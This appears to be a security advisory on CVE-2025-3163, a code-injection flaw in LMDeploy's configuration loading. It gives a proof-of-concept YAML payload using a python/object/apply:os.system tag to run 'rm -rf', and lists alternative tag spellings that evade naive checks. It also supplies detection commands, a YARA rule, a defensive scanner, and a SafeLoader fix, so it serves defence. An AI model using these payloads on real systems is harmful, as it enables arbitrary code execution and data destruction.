How CVE-2025-3163 Works
The vulnerability lies in LMDeploy's configuration file parsing logic in `lmdeploy/docs/en/conf.py`. The `Open()` function does not validate its input, so a crafted configuration file can lead to arbitrary Python code execution: an attacker supplies specially formatted YAML/JSON content that is evaluated when LMDeploy loads project configurations. Code injected this way runs with the privileges of the process that loaded the file, so the outcome is local privilege escalation or wider system compromise. The attack vector is local: the attacker needs prior access to place or modify a configuration file, but from there can take over the host.
DailyCVE Form
Platform: LMDeploy
Version: <= 0.7.1
Vulnerability: Code Injection
Severity: Critical
Date: 04/23/2025
What Undercode Say:
Exploitation:
Proof-of-Concept exploit:

```python
# Proof-of-Concept exploit: writes a YAML document whose !!python/object/apply tag
# makes an unsafe loader (yaml.load without SafeLoader, or yaml.unsafe_load) call
# os.system with the attacker's command as soon as the file is parsed.
malicious_conf = """\
!!python/object/apply:os.system
args: ['rm -rf /critical/path']
"""

with open('exploit.conf', 'w') as f:
    f.write(malicious_conf)
```
Detection:
Check vulnerable versions:

```shell
# Installed version (<= 0.7.1 is affected)
pip show lmdeploy | grep Version
# Locate the unvalidated open() call in the configuration parsing logic
grep -r "open(" /path/to/lmdeploy/docs/en/conf.py
```
Mitigation:
Safe config parsing patch:

```python
# SafeLoader only constructs plain YAML types (mappings, sequences, scalars) and
# raises yaml.constructor.ConstructorError on !!python/* tags instead of importing
# modules or calling functions, so a payload like the PoC above is rejected.
import yaml
from yaml import SafeLoader


def safe_open(config_path):
    with open(config_path) as f:
        return yaml.load(f, Loader=SafeLoader)  # same as yaml.safe_load(f)
```
Network Indicators:
N/A (Local exploit)
Forensic Artifacts:
Check for malicious configs (the original `-name ".conf"` only matched a file literally named `.conf`; the glob below covers the config file types this post describes):

```shell
find / \( -name "*.conf" -o -name "*.yaml" -o -name "*.yml" -o -name "*.json" \) \
     -exec grep -l "!!python" {} + 2>/dev/null
```
Remediation Steps:
1. Upgrade to LMDeploy 0.7.2+
2. Audit all configuration files
3. Restrict config file permissions
YARA Rule:
```yara
rule lmdeploy_code_injection
{
    strings:
        $pattern = "!!python/" nocase
    condition:
        filesize < 1MB and $pattern
}
```
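The grep and YARA checks above look only for the `!!python/` shorthand. PyYAML resolves that handle to the `tag:yaml.org,2002:python/` namespace, so the same constructor is reached through a verbatim tag (`!<tag:yaml.org,2002:python/object/apply:os.system>`) or through a `%TAG` directive that aliases the namespace to a custom handle, and a scanner that stops at the shorthand misses both. The scanner below is an added example, not code from this page or from the LMDeploy project: it flags all three forms with line numbers, walks a directory for the config file types named in this post, and, when PyYAML happens to be installed, confirms that `yaml.safe_load` refuses each payload. The sample documents and file names are constructed for the demo.

```python
import re
import tempfile
from pathlib import Path
from typing import List, Optional, Tuple

try:
    import yaml  # PyYAML; optional, used only to confirm SafeLoader behaviour
except ImportError:
    yaml = None

PY_NAMESPACE = "tag:yaml.org,2002:python"

# Three spellings that all resolve to PyYAML's python/* constructors.
SHORTHAND = re.compile(r"!!python/[\w/.:]*")                    # !!python/object/apply:os.system
VERBATIM = re.compile(r"!<tag:yaml\.org,2002:python/[^>]*>")     # !<tag:yaml.org,2002:python/...>
TAG_DIRECTIVE = re.compile(r"^%TAG\s+(!(?:[\w-]*!)?)\s+(\S+)")   # %TAG !py! tag:yaml.org,2002:python/

CONFIG_SUFFIXES = {".conf", ".yaml", ".yml", ".json"}

# Constructed samples (not taken from any real deployment).
BENIGN = """\
# ordinary project configuration
model_path: ./models/demo
port: 23333
"""
SHORTHAND_PAYLOAD = """\
!!python/object/apply:os.system
args: ['id']
"""
VERBATIM_PAYLOAD = """\
!<tag:yaml.org,2002:python/object/apply:os.system>
args: ['id']
"""
DIRECTIVE_PAYLOAD = """\
%TAG !py! tag:yaml.org,2002:python/
---
!py!object/apply:os.system
args: ['id']
"""


def find_dangerous_tags(text: str) -> List[Tuple[int, str]]:
    """Return (line_number, token) for every tag that would instantiate Python objects."""
    findings: List[Tuple[int, str]] = []
    aliased_handles: List[str] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        directive = TAG_DIRECTIVE.match(line)
        if directive:
            handle, prefix = directive.groups()
            if prefix.startswith(PY_NAMESPACE):
                # From here on any "<handle>suffix" token resolves into the python namespace.
                aliased_handles.append(handle)
                findings.append((lineno, line.strip()))
            continue
        for pattern in (SHORTHAND, VERBATIM):
            for m in pattern.finditer(line):
                findings.append((lineno, m.group(0)))
        for handle in aliased_handles:
            for m in re.finditer(re.escape(handle) + r"[\w/.:]+", line):
                hit = (lineno, m.group(0))
                if hit not in findings:
                    findings.append(hit)
    return findings


def scan_tree(root) -> List[Tuple[Path, List[Tuple[int, str]]]]:
    """Walk root and report every config-like file carrying a dangerous tag."""
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in CONFIG_SUFFIXES:
            findings = find_dangerous_tags(path.read_text(errors="replace"))
            if findings:
                hits.append((path, findings))
    return hits


def safe_loader_rejects(text: str) -> Optional[bool]:
    """True if yaml.safe_load refuses the document, False if it parses it,
    None when PyYAML is not installed."""
    if yaml is None:
        return None
    try:
        yaml.safe_load(text)
    except yaml.YAMLError:  # ConstructorError for python/* tags is a YAMLError subclass
        return True
    return False


def demo_scan() -> dict:
    """Write the constructed samples into a temp directory, scan it, return {name: findings}."""
    samples = {
        "benign.yaml": BENIGN,
        "shorthand.conf": SHORTHAND_PAYLOAD,
        "verbatim.yml": VERBATIM_PAYLOAD,
        "directive.yaml": DIRECTIVE_PAYLOAD,
        "notes.txt": SHORTHAND_PAYLOAD,  # deliberately outside the scanned suffixes
    }
    with tempfile.TemporaryDirectory() as root:
        for name, text in samples.items():
            Path(root, name).write_text(text)
        return {path.name: findings for path, findings in scan_tree(root)}


if __name__ == "__main__":
    for name, findings in demo_scan().items():
        print(name, findings)
    for doc in (SHORTHAND_PAYLOAD, VERBATIM_PAYLOAD, DIRECTIVE_PAYLOAD):
        print("SafeLoader rejects:", safe_loader_rejects(doc))
```

The scanner is a triage tool, not a parser: a `!!python/` string inside a YAML comment is flagged too, which is the right trade-off when hunting for planted configs. Pair it with the SafeLoader patch above; the scanner finds files to investigate, the loader change is what stops execution.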
Sources:
Reported By: nvd.nist.gov